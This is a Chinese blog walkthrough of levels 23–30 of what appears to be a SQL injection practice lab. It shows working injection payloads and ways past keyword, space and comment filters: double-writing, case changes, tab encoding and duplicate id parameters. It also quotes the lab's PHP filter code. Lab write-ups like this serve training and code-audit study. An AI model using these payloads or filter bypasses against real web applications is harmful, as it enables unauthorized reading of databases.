不知不觉鸽了几天了,没办法去旅游摸鱼是这样的了,抓紧时间来小更一下
23.过滤注释符号
先手工注入一下,就能发现两个单引号不报错,但是一旦上到注释符号的话就会报错,可以猜测出是对注释符号进行了过滤,我们也去看一下源码!!
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
不难发现,源代码的意思就是将 # -- 这两个注释符号替换成空,那很简单我们不注释就好了
不多说下一关!!
24.二次注入
这个关卡在前面讲过,就不多赘述,有兴趣的话可以翻一下我前面的文章
25.小小过滤and,编码秒了
这一关从它的提示都能发现他过滤了and和or,但是没有过滤编码(我猜的)
于是就开始poc:
1'+%26%26+1=1--+
成功能够看见返回(Hint:在sql中and和&&的作用都是一样的)
26.过滤我and?还过滤我空格?但是无伤大雅
这一关一开始我是没有看提示的,直接手工注入,字符型,没跑
然后注释测试发现又给我过滤了,于是就写这样的poc
id=1'+and+1='1
不出意外,报错。。。。。。于是就在想是不是and导致的报错,于是poc就有
id=1'and'
回显正常,说明是and被过滤,尝试编码绕过
没有回显(报错),说明是and被过滤, 而且%26%26被成功解析
于是继续我们的poc
id=1'+%26%26+1='1
发现能成功回显,然后其实完全就到此为止了,但是,!@@@@!!!!
看一眼提示?其实就能发现它对空格也进行了过滤,但是没有什么关系,因为就算sql语句堆在一起,只要不触碰到关键词,都是会执行的,但是如果你想完美 加个/**/就好
27.and?三次绕过&&大小写
这题其实完全可以直接用and秒了,但是既然他都已经在暗示我过滤了select 和union了 那我怎么好意思不绕一下waf 开始poc(因为注释被过滤,所以select的最后一个要是'包裹)
321331231'+union+select+1,2,'1
看看被过滤成了啥?好家伙,空格,union select 你是吞的一个不剩😓😓
那我们分别试一下双写一下试试?发现union和tab(%09)是出来了,但是我select呢??
321331231'+uniunionon%09seselectlect%091,2,'1
于是试一下大小写?,成功绕过WAF
321331231'+uniunionon%09SelEct%091,user(),'1
这样就做出来了,但是还是得去看一下源代码,(为了日后的代码审计)
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
- 可以看到首先它是过滤了/ 和*
- 然后将 -- #这些过滤掉
- 接着就是空格了
- 接下来就是select 了可以看见它前前后后一共过滤了两次,所以这就是为什么我们对select双写没有用的原因
- 然后就是对union进行替换,而且是只替换一次,这里就是为什么可以进行双写绕过的原因
那么审计完代码了,其实我们是不是可以对select 进行一次三写,?这样也是可以的
321331231'+uniunionon%09seselecselecttlect%091,user(),'1
28.这不看源代码写的出来??牛魔WAF
这个题呃呃呃,感觉不看源代码真的绕不过这这个waf啊
我belike:
来吧,先上最简单的poc:
1'%09union%09select%091,2,'3
发现变成了这样,双写一下试试看?
?又不过滤了
1'%09uniounionn%09seselectlect%091,2,'3
再来?
1'%09unionunion%09selectselect%091,2,'3
这是什么神奇waf(长见识了,其实这种就已经不在是匹配关键字)
而是匹配一种结构!!!!!!
于是就可以发现它匹配的是 union select这样的结构,那我们替换一下就好
2321312321312'%09union%09union%09selectselect%091,user(),'3
但是呢,你会收获一个这个
可以看见语句是被构造出来了,但是没有被执行,而且这个报错也不是我们常见的类型syntax error 于是我们去翻译一下 期待参数1是资源,但是却接收到了布尔值
也就是说接收到得分参数不匹配,于是去看一下源代码。。。。
sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
逆天!!!还有一个 () 怪不得一直不对,所以最终的poc就出来了
2321312321312')%09union%09union%09selectselect%091,user(),('3
29.明明可以绝杀,但是为什么要故意放水(bushi)
这一关,明明作者可以直接堵死注入点,但是他还是留了一条出路 来看!!!
首先看见这个hint就知道不简单,来看看他有多逆天
先是最简单的 1’这样的判断
发现就直接被过滤了,而且这题你会发现你怎么绕过都是这个结果,没办法,看源码
直到我看完源代码才知道什么是不是不可以,而是没有必要
先来看一个函数 whitelist
function whitelist($input)
{$match = preg_match("/^\d+$/", $input);if($match){//echo "you are good";//return $match;}else{ header('Location: hacked.php');//echo "you are bad";}
}
- 这里唯一要解释一下的,因该就只有$match = preg_match("/^\d+$/", $input); 了
- 这个表示的是正则匹配传入的参数从开头到结尾是不是都是纯数字
- 然后如果不是的话就跳转至 hacked.php 然后阻断注入
本来这个就已经是绝杀了的,但是慈祥的出题人还是给我们留下了退路(像极了老师捞人的样子)
函数java_implimentation()
function java_implimentation($query_string)
{$q_s = $query_string;$qs_array= explode("&",$q_s);foreach($qs_array as $key => $value){$val=substr($value,0,2);if($val=="id"){$id_value=substr($value,3,30); return $id_value;echo "<br>";break;}}}
- 巴拉巴拉一大堆,其实就是在将传入的参数以&符号分割开来,用数组接收
- 并且它只检查第一个id值,并且返回id后面的参数值(就是这里在放水!!)
放水还远不止于此,继续看!!!
$qs = $_SERVER['QUERY_STRING'];$hint=$qs;$id1=java_implimentation($qs);$id=$_GET['id'];//echo $id1;whitelist($id1);// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
其实我一直很好奇 他为什么不将$sql里面的动态插入的sql语句中的$id 换成能够通过过滤的$id1
看的出来放水放到极致了
所以这题的绕过方法就出来了, 写两个id
- 第一个id为正常的数字参数,能够被正常检验,并且通过waf 然后再将后面咩有过滤的id拼接上去造成注入
于是就有最终的poc
id=1'&id=-1'+union+select+1,database(),user()--+
30.还是29关但是"
这一关还是一样,不过后面的 ' 要改成双引号 " 然后其他的都一样了 poc:
id=0&id=0"+union+select+1,user(),database()--+
差不多,写了七关,感觉要写到累死了, ,后面的先鸽着,有时间再补,到时候过年的时候打算自己开一下红队,因为 我的兄弟:
我的兄弟萌,"内网,才是真正的战场,才是一个人的知识体系的最终融合体现!!!"